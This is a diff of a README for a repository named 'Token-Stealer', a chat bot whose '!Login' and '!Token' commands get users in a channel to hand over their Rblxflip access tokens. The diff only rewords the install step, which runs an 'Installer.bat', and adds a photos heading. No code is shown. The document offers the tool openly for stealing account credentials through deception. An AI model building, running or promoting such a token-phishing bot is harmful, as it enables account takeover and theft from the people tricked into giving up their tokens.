AdamxzV3/Token-Stealer/README.md

 ## :inbox_tray: Installation

 1. Download this repo or clone it
-2. Install the required packages: `By running Install.bat`
+2. Install the required package By running: ` Installer.bat`

 ## :keyboard: Usage

 - Type `!Login` in a channel to prompt users to provide their Rblxflip access token.
 - Type `!Token` in a channel to display information about what an access token is and how to get it.

+## :rocket: Photos

 ![Alt Text](1.png)
 ![Alt Text](2.png)